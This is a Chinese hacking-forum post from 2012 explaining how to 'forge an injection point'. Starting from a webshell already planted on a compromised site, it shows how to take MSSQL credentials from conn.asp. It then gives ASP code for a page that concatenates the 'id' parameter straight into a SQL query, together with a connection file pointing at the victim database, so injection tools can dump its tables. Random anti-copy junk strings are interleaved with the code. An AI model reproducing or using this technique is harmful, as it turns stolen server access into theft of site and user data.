中国网络渗透测试联盟
标题:
伪造注入点方法
[打印本页]
作者:
admin
时间:
2012-9-13 17:53
标题:
伪造注入点方法
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表。因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
- H8 N. b; H; p% d6 h) n
ASP/Visual Basic代码
! D- B! v/ h7 u0 B( @' t
<!--#include file="xx.asp"-->
( ^" W* Y8 n4 n" I! g7 g' E! B
<%
& J1 X3 m' s$ ^- X, B
set rs=server.createobject("ADODB.recordset")
+ k) L1 N% {" O! r$ b
id = request("id")
8 j2 V0 Y$ J/ I B0 o' {
strSQL = "select * from admin where id=" & id
3 X2 [5 ?/ w+ R: @
rs.open strSQL,conn,1,3
. Z! O: o+ w& F
rs.close
; U2 U- `3 {0 V
%>
* N% q% p$ n7 @; q! D- y" D. n
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在。你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
2 I, \. y% s4 O, ^" N
然后就要构造一个连接数据库的文件了,代码如下:
7 M, F9 z9 f( j4 G# F) V' A
ASP/Visual Basic代码
, C- v7 C6 H6 q5 y9 C7 |% N6 z
<%
0 o! a2 Q+ Q( U. Y/ \4 l: i
strSQLServerName = "000.000.000.000" '服务器名称或地址
7 U5 v6 O( w% a5 s/ T- @9 ?8 i
strSQLDBUserName = "sqlname" '数据库帐号
, C( F0 A% a" l
strSQLDBPassword = "sqlpass" '数据库密码
0 V! ~8 U8 G, I; y5 l' p1 c
strSQLDBName = "sqldataname" '数据库名称
( C. V; P( F1 }
Set conn = Server.CreateObject("ADODB.Connection")
1 H1 C1 @5 c# p5 f# ^, \
strCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
/ N: [3 a; e2 w, \" {+ C. @$ F9 u
conn.open strCon
6 G" l& {2 ^5 c6 C- p
%>
9 E* H4 N V1 z' T; I. _
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。就这样,正常情况下,就OK了,伪造成功
2 ] o0 p3 o1 ~, l$ L% }: M
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2